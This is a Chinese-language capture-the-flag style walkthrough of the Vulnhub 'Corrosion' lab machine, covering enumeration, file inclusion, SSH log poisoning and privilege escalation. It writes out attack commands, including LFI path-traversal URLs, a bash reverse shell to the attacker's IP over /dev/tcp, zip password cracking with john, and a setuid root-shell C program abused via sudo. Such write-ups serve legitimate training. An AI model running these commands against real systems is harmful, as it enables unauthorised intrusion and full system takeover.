Vulnhub: Corrosion靶机

kali:192.168.111.111

靶机:192.168.111.130

信息收集

端口扫描

nmap -A -sC -v -sV -T5 -p- --script=http-enum 192.168.111.130

目录爆破

blog-post目录下存在两个目录

对archives目录中的randylogs.php进行测试发现存在文件包含

wfuzz -c -w /opt/zidian/SecLists-2022.2/Discovery/Web-Content/burp-parameter-names.txt --hc 404 --hh 0 http://192.168.111.130/blog-post/archives/randylogs.php?FUZZ=../../../../../../../../../../../../../etc/passwd

Vulnhub: Corrosion靶机_第1张图片

漏洞利用

成功包含ssh日志

http://192.168.111.130/blog-post/archives/randylogs.php?file=../../../../../../../../../var/log/auth.log

利用ssh写入webshell到ssh日志文件中,再配合文件包含拿shell

ssh ''@192.168.111.130

Vulnhub: Corrosion靶机_第2张图片

文件包含ssh日志文件执行反弹shell

#需要进行url编码
bash -c 'exec bash -i >& /dev/tcp/192.168.111.111/4444 0>&1'

Vulnhub: Corrosion靶机_第3张图片

提权

在/var/backups目录下发现user_backup.zip压缩包

Vulnhub: Corrosion靶机_第4张图片

解压发现需要密码,把文件下载到本地爆破

zip2john user_backup.zip > hash
john hash --wordlist=/usr/share/wordlists/rockyou.txt

Vulnhub: Corrosion靶机_第5张图片

解压后发现私钥文件和密码

Vulnhub: Corrosion靶机_第6张图片

利用私钥登录randy用户

ssh [email protected] -i id_rsa

Vulnhub: Corrosion靶机_第7张图片

randy用户sudo权限

Vulnhub: Corrosion靶机_第8张图片

查看/usr/randy/tools/easysysinfo.py后尝试修改环境变量提权,但没有成功,用c语言写一个程序替代easysysinfo

 #include
 int main()
 {
     setuid(0);
     setgid(0);
     system("/bin/bash");
 }

gcc编译后执行,提升为root

gcc a.c -o easysysinfo
sudo -u root /home/randy/tools/easysysinfo

Vulnhub: Corrosion靶机_第9张图片

flag

Vulnhub: Corrosion靶机_第10张图片

你可能感兴趣的:(web安全,网络安全,安全)